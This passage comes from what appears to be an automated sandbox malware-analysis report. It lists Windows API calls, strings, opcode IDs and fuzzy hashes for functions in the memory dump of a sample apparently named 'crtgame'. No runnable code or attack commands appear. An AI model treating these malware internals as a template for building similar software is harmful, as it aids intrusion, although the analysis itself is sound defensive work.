                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02A3268E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A32699
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02A326AD
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02A326BD
                                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02A326C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                            • String ID:
                                                                                            • API String ID: 1213838671-0
                                                                                            • Opcode ID: 259ff42eb5b211a87cd93347f16bf0a88f7f06d62832eceab1bd4d419549ccc8
                                                                                            • Instruction ID: cd5bfe14f7b55e710771e9afeba86c92cd72e8e14044a4fd2947359208103b0c
                                                                                            • Opcode Fuzzy Hash: 259ff42eb5b211a87cd93347f16bf0a88f7f06d62832eceab1bd4d419549ccc8
                                                                                            • Instruction Fuzzy Hash: FF610B71940319AFCB11DFA4D984AAEBBB9FF08310F10496AF916E3240EB34DA55CB60
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34533
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                            • htons.WS2_32(?), ref: 02A34594
                                                                                            • htonl.WS2_32(?), ref: 02A345B7
                                                                                            • htonl.WS2_32(00000000), ref: 02A345BE
                                                                                            • htons.WS2_32(00000000), ref: 02A34672
                                                                                            • _sprintf.LIBCMT ref: 02A34688
                                                                                            • htons.WS2_32(?), ref: 02A345DB
                                                                                              • Part of subcall function 02A390C0: __EH_prolog.LIBCMT ref: 02A390C5
                                                                                              • Part of subcall function 02A390C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02A39140
                                                                                              • Part of subcall function 02A390C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A3915E
                                                                                              • Part of subcall function 02A31BA7: __EH_prolog.LIBCMT ref: 02A31BAC
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31BBC
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31BEA
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31C13
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31C56
                                                                                              • Part of subcall function 02A3D87F: __EH_prolog.LIBCMT ref: 02A3D884
                                                                                            • htonl.WS2_32(?), ref: 02A348A7
                                                                                            • htonl.WS2_32(00000000), ref: 02A348AE
                                                                                            • htonl.WS2_32(00000000), ref: 02A348F3
                                                                                            • htonl.WS2_32(00000000), ref: 02A348FA
                                                                                            • htons.WS2_32(?), ref: 02A3491A
                                                                                            • htons.WS2_32(?), ref: 02A34924
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                                            • String ID:
                                                                                            • API String ID: 725951905-0
                                                                                            • Opcode ID: 8d23eeb9d3c87d1482d2efa8d029b3371c632f25b3f1c4203ef83fb9aba0c550
                                                                                            • Instruction ID: aff9a82af61157f7157a59b20900a20c67b05579fd6368c8dcfd75c525ba8963
                                                                                            • Opcode Fuzzy Hash: 8d23eeb9d3c87d1482d2efa8d029b3371c632f25b3f1c4203ef83fb9aba0c550
                                                                                            • Instruction Fuzzy Hash: 8D0228B1D40219EEEF16DBA4C944BEEBBB9AF09304F10419AF505B7280DF745A49CFA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33428
                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02A3346B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02A33472
                                                                                            • GetLastError.KERNEL32 ref: 02A33486
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A334D7
                                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02A334ED
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02A33518
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                            • String ID: CancelIoEx$KERNEL32
                                                                                            • API String ID: 2902213904-434325024
                                                                                            • Opcode ID: 3ccfbc3965787029c1962cb203aa4f6b20e8c089c5522b85f9a7eb30c79d4380
                                                                                            • Instruction ID: 0d27d635229e54bb20cd765c764dbafcd1376ac947cb94dc8d466ba5a972dc7c
                                                                                            • Opcode Fuzzy Hash: 3ccfbc3965787029c1962cb203aa4f6b20e8c089c5522b85f9a7eb30c79d4380
                                                                                            • Instruction Fuzzy Hash: 2C315EB1944325DFDF129F64C98466ABBF9FF49321F008899F906AB240DF70D901CBA1
                                                                                            APIs
                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02A410B0
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A410C5
                                                                                            • ResetEvent.KERNEL32(00000000), ref: 02A410CF
                                                                                            • CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,E756C9BC), ref: 02A4117A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A4118F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                                            • String ID:
                                                                                            • API String ID: 1285874450-0
                                                                                            • Opcode ID: ae8fa74201eebda21fc5a19bd0bf045098b0146a84337aa7f6b5e3a9b8b2d8c3
                                                                                            • Instruction ID: db536ee55c7d5409206ab933b52024cff8dbc409c4b1e7729bb881fd28df9f61
                                                                                            • Opcode Fuzzy Hash: ae8fa74201eebda21fc5a19bd0bf045098b0146a84337aa7f6b5e3a9b8b2d8c3
                                                                                            • Instruction Fuzzy Hash: 1A411F70D04358ABDF10CFA9C884BAEB7B8AF45724F144619E829EB280DF70E945CB51
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A320AC
                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A320CD
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A320D8
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02A3213E
                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02A3217A
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02A32187
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A321A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1171374749-0
                                                                                            • Opcode ID: 1e09c94948a797998c21e4862357454973d353c03b750001bbf70f1f170a2aa7
                                                                                            • Instruction ID: af1be66779c6db83691caa3aec6bb3f36b9883898562b30f8e9efb06633e3374
                                                                                            • Opcode Fuzzy Hash: 1e09c94948a797998c21e4862357454973d353c03b750001bbf70f1f170a2aa7
                                                                                            • Instruction Fuzzy Hash: 5D4109715447019FC312DF25D984A6BBBF9FFC8754F104A1EB89A92250DB30E90ACFA2
                                                                                            APIs
                                                                                              • Part of subcall function 02A418D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02A4112E,?,?), ref: 02A418FF
                                                                                              • Part of subcall function 02A418D0: CloseHandle.KERNEL32(00000000,?,?,02A4112E,?,?), ref: 02A41914
                                                                                              • Part of subcall function 02A418D0: SetEvent.KERNEL32(00000000,02A4112E,?,?), ref: 02A41927
                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02A410B0
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A410C5
                                                                                            • ResetEvent.KERNEL32(00000000), ref: 02A410CF
                                                                                            • CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02A41135
                                                                                              • Part of subcall function 02A43F5A: RaiseException.KERNEL32(?,?,?,02A60F6C,?,00000400,?,?,?,02A4359C,?,02A60F6C,00000000,00000001), ref: 02A43FAF
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,E756C9BC), ref: 02A4117A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A4118F
                                                                                              • Part of subcall function 02A41610: GetCurrentProcessId.KERNEL32(?), ref: 02A41669
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,E756C9BC), ref: 02A4119F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                            • String ID:
                                                                                            • API String ID: 2227236058-0
                                                                                            • Opcode ID: 36b8db22eb03bc73828d4fd559eb2b79de871c459831d8435f6852ac80351a27
                                                                                            • Instruction ID: ab3fdca6b064039fa490243b967b40d3d91342f85fb50d9f699592240c0e3429
                                                                                            • Opcode Fuzzy Hash: 36b8db22eb03bc73828d4fd559eb2b79de871c459831d8435f6852ac80351a27
                                                                                            • Instruction Fuzzy Hash: BE315271D403589BDF24CBA4DC84BADB7B9AF85714F140219E81DFB280EF60E985CB51
                                                                                            APIs
                                                                                            • __init_pointers.LIBCMT ref: 02A45794
                                                                                              • Part of subcall function 02A47F02: RtlEncodePointer.NTDLL(00000000), ref: 02A47F05
                                                                                              • Part of subcall function 02A47F02: __initp_misc_winsig.LIBCMT ref: 02A47F20
                                                                                              • Part of subcall function 02A47F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02A48C81
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02A48C95
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02A48CA8
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02A48CBB
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02A48CCE
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02A48CE1
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02A48CF4
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02A48D07
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02A48D1A
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02A48D2D
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02A48D40
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02A48D53
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02A48D66
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02A48D79
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02A48D8C
                                                                                              • Part of subcall function 02A47F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02A48D9F
                                                                                            • __mtinitlocks.LIBCMT ref: 02A45799
                                                                                            • __mtterm.LIBCMT ref: 02A457A2
                                                                                              • Part of subcall function 02A4580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02A4833A
                                                                                              • Part of subcall function 02A4580A: RtlDeleteCriticalSection.NTDLL(02A63978), ref: 02A48363
                                                                                            • __calloc_crt.LIBCMT ref: 02A457C7
                                                                                            • __initptd.LIBCMT ref: 02A457E9
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02A457F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                            • String ID:
                                                                                            • API String ID: 1500305132-0
                                                                                            • Opcode ID: b9ad63d84455dcdef94f8ad233aaf17efaac29349ebe26958fe8ff5fadb27247
                                                                                            • Instruction ID: 3e397a8dfd20fad9b28be41685e841cbb3990b2abccc592464294a55eed6e8c6
                                                                                            • Opcode Fuzzy Hash: b9ad63d84455dcdef94f8ad233aaf17efaac29349ebe26958fe8ff5fadb27247
                                                                                            • Instruction Fuzzy Hash: BAF02432D993116FE6343B757D45A4E27C6EF91B34BA10A2AE210D50C0FF11D4025A50
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02A42E73,00000000), ref: 02A42EDB
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02A42EE2
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02A42EEE
                                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02A42F0B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                            • String ID: RoInitialize$combase.dll
                                                                                            • API String ID: 3489934621-340411864
                                                                                            • Opcode ID: bba5b63f37a8459130c223409fad01e87b4a9d38160fa717e1b48da045fa985f
                                                                                            • Instruction ID: b2900e72c5bedabb1617c249246122aa20ba7bfb2b9a94c8772f9220bfa152f7
                                                                                            • Opcode Fuzzy Hash: bba5b63f37a8459130c223409fad01e87b4a9d38160fa717e1b48da045fa985f
                                                                                            • Instruction Fuzzy Hash: 5FE01A70ED0360BEEB105F70ED4EB067B69B740B02F908824FA02E1090DFB9C0AA8F10
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02A42EB0), ref: 02A42FB0
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02A42FB7
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02A42FC2
                                                                                            • RtlDecodePointer.NTDLL(02A42EB0), ref: 02A42FDD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                            • API String ID: 3489934621-2819208100
                                                                                            • Opcode ID: 407f6313b672eab496394893451fc579006388a2de5b6f16d2bf0cdeb071ad50
                                                                                            • Instruction ID: b33583a4c29fd287be11a909a6c2fb7f1172eac911e3704ceb908bf8f96c96d2
                                                                                            • Opcode Fuzzy Hash: 407f6313b672eab496394893451fc579006388a2de5b6f16d2bf0cdeb071ad50
                                                                                            • Instruction Fuzzy Hash: DDE0B670DC4314BFEB505F60AD0DB167A69B744B01F518934F902E10A4DFB8D066CB10
                                                                                            APIs
                                                                                            • TlsGetValue.KERNEL32(00000025,E756C9BC,?,?,?,?,00000000,02A564B8,000000FF,02A41BCA), ref: 02A4196A
                                                                                            • TlsSetValue.KERNEL32(00000025,02A41BCA,?,?,00000000), ref: 02A419D7
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A41A01
                                                                                            • HeapFree.KERNEL32(00000000), ref: 02A41A04
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: HeapValue$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1812714009-0
                                                                                            • Opcode ID: 7df9656468eb44964347f78208496461d48fef31658b636121c0e29b3d13fd86
                                                                                            • Instruction ID: 2da5bdadd383243a2779534de7859f2c286f703566e5edb737475b7d6ef81922
                                                                                            • Opcode Fuzzy Hash: 7df9656468eb44964347f78208496461d48fef31658b636121c0e29b3d13fd86
                                                                                            • Instruction Fuzzy Hash: FF5191319043549FD710CF29C884B16BBE4EF85764F098A69E85D97280DF70EC85CBA1
                                                                                            APIs
                                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02A55190
                                                                                            • __FindPESection.LIBCMT ref: 02A551AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                                            • String ID:
                                                                                            • API String ID: 876702719-0
                                                                                            • Opcode ID: 9efcd192c84eb99d70b6a24b6646756f3848044774cee0a091b7a045e165f271
                                                                                            • Instruction ID: da6703b6b28833867de284da4688ddb660624c3875cb140ede8ff2b430f20cca
                                                                                            • Opcode Fuzzy Hash: 9efcd192c84eb99d70b6a24b6646756f3848044774cee0a091b7a045e165f271
                                                                                            • Instruction Fuzzy Hash: F8A18B71E006258FCB10CF58D984BAEF7A5FB45328F9546A9DD09AB391EF31E841CB90
                                                                                            APIs
                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02A31CB1
                                                                                            • CloseHandle.KERNEL32(?), ref: 02A31CBA
                                                                                            • InterlockedExchangeAdd.KERNEL32(02A674EC,00000000), ref: 02A31CC6
                                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02A31CD4
                                                                                            • QueueUserAPC.KERNEL32(02A31E7C,?,00000000), ref: 02A31CE1
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02A31CEC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                            • String ID:
                                                                                            • API String ID: 1946104331-0
                                                                                            • Opcode ID: 062165a90508a3844738d53105a80e6cd2eb81956beb5735155067572efdb6e1
                                                                                            • Instruction ID: 96ed7e2e784765afb06fbe1636907ead23d86f800218fe5525ccbcaefc3758e1
                                                                                            • Opcode Fuzzy Hash: 062165a90508a3844738d53105a80e6cd2eb81956beb5735155067572efdb6e1
                                                                                            • Instruction Fuzzy Hash: E2F03C35940324BFDB215B9ADD0DC9BFFFCEF89721B004659F52AA2190DF61A9118B60
                                                                                            APIs
                                                                                            • std::exception::exception.LIBCMT ref: 02A4137F
                                                                                              • Part of subcall function 02A41ED3: std::exception::_Copy_str.LIBCMT ref: 02A41EEC
                                                                                              • Part of subcall function 02A40750: __CxxThrowException@8.LIBCMT ref: 02A407AE
                                                                                            • std::exception::exception.LIBCMT ref: 02A413DE
                                                                                            Strings
                                                                                            • boost unique_lock has no mutex, xrefs: 02A4136E
                                                                                            • $, xrefs: 02A413E3
                                                                                            • boost unique_lock owns already the mutex, xrefs: 02A413CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                            • API String ID: 2140441600-46888669
                                                                                            • Opcode ID: bd6dd45494eb94357784d9286990a2dc1bae30dc4f8dc3579017ed3dc7d9af2f
                                                                                            • Instruction ID: afa50a858d113834a388d477524843a4c1449090e8040a2a4c9238a384f821ab
                                                                                            • Opcode Fuzzy Hash: bd6dd45494eb94357784d9286990a2dc1bae30dc4f8dc3579017ed3dc7d9af2f
                                                                                            • Instruction Fuzzy Hash: CE21F5B15487909FD710DF24C64475BBBE9AB88B08F408E5DF4A587680DFB9D848CF92
                                                                                            APIs
                                                                                            • __getptd_noexit.LIBCMT ref: 02A44480
                                                                                              • Part of subcall function 02A45672: GetLastError.KERNEL32(?,02A43569,02A45860,02A42A33,00000400,?,02A43569,02A3F37C,?,?,02A3F37C,00000000), ref: 02A45674
                                                                                              • Part of subcall function 02A45672: __calloc_crt.LIBCMT ref: 02A45695
                                                                                              • Part of subcall function 02A45672: __initptd.LIBCMT ref: 02A456B7
                                                                                              • Part of subcall function 02A45672: GetCurrentThreadId.KERNEL32 ref: 02A456BE
                                                                                              • Part of subcall function 02A45672: SetLastError.KERNEL32(00000000,02A43569,02A3F37C,?,?,02A3F37C,00000000), ref: 02A456D6
                                                                                            • __calloc_crt.LIBCMT ref: 02A444A3
                                                                                            • __get_sys_err_msg.LIBCMT ref: 02A444C1
                                                                                            • __invoke_watson.LIBCMT ref: 02A444DE
                                                                                            Strings
                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02A4448B, 02A444B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                            • API String ID: 109275364-798102604
                                                                                            • Opcode ID: bfee42a3f586ae6430acfe1f73f7ddfe61a99ec9fa4d5558abe3be71fe9a3ef8
                                                                                            • Instruction ID: e2c257cfdca67ae6f3b9d876bae7b0ae45de53744db4ecec5d57267628b8e147
                                                                                            • Opcode Fuzzy Hash: bfee42a3f586ae6430acfe1f73f7ddfe61a99ec9fa4d5558abe3be71fe9a3ef8
                                                                                            • Instruction Fuzzy Hash: 84F05972980B146BA62166265D80B2BB3DEEBC9BF1B804426FD44D6600EF39DD000694
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A32350
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A32360
                                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A32370
                                                                                            • GetLastError.KERNEL32 ref: 02A3237A
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID: pqcs
                                                                                            • API String ID: 1619523792-2559862021
                                                                                            • Opcode ID: 86a80e2a49ee535a9a7e77fccd6109f367c8cf85dc8c68e9a697cc2bf53dd718
                                                                                            • Instruction ID: d10b13b47a1d81166213661356868191a0081b8b4e2d9d91f8deeaa24420e0eb
                                                                                            • Opcode Fuzzy Hash: 86a80e2a49ee535a9a7e77fccd6109f367c8cf85dc8c68e9a697cc2bf53dd718
                                                                                            • Instruction Fuzzy Hash: A3F03070A80314ABD721AF74AD49BABB7ACEF45701B0009AAF909E3140FF70DD558B91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34035
                                                                                            • GetProcessHeap.KERNEL32(00000000,02A3A5C3,?,?,?,?,?,02A3A5C3), ref: 02A34042
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A34049
                                                                                            • std::exception::exception.LIBCMT ref: 02A34063
                                                                                              • Part of subcall function 02A3A053: __EH_prolog.LIBCMT ref: 02A3A058
                                                                                              • Part of subcall function 02A3A053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A3A067
                                                                                              • Part of subcall function 02A3A053: __CxxThrowException@8.LIBCMT ref: 02A3A086
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3112922283-2104205924
                                                                                            • Opcode ID: 56f97ba2d51dd282596956f3856c26e948a6075a015a44260eb7756a835dbd8a
                                                                                            • Instruction ID: 14d0509f1feebb73ccf5b5d120b35670ea90131f203be3431b04dac550243abe
                                                                                            • Opcode Fuzzy Hash: 56f97ba2d51dd282596956f3856c26e948a6075a015a44260eb7756a835dbd8a
                                                                                            • Instruction Fuzzy Hash: AAF058B2E84219AFDB11EFE0D908BAFBBB9EF08701F004559E915A2240DF798215CF91
                                                                                            APIs
                                                                                              • Part of subcall function 02A41450: CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A414A1
                                                                                              • Part of subcall function 02A41450: WaitForSingleObject.KERNEL32(?,000000FF,E756C9BC,?,?,?,?,E756C9BC,02A41423,E756C9BC), ref: 02A414B8
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A4171E
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A4173E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02A41777
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02A417CB
                                                                                            • SetEvent.KERNEL32(?), ref: 02A417D2
                                                                                              • Part of subcall function 02A3418C: CloseHandle.KERNEL32(00000000,?,02A41705), ref: 02A341B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                            • String ID:
